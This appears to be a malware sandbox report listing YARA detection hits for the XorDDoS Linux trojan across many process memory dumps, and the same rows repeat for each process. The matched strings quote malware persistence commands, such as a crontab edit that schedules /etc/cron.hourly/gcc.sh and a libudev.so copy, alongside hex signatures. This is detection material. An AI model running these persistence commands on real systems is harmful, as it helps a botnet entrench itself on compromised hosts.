6335.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6335.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6335.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6335.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6335.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6335.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6335.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6516.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6402.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6453.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6241.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
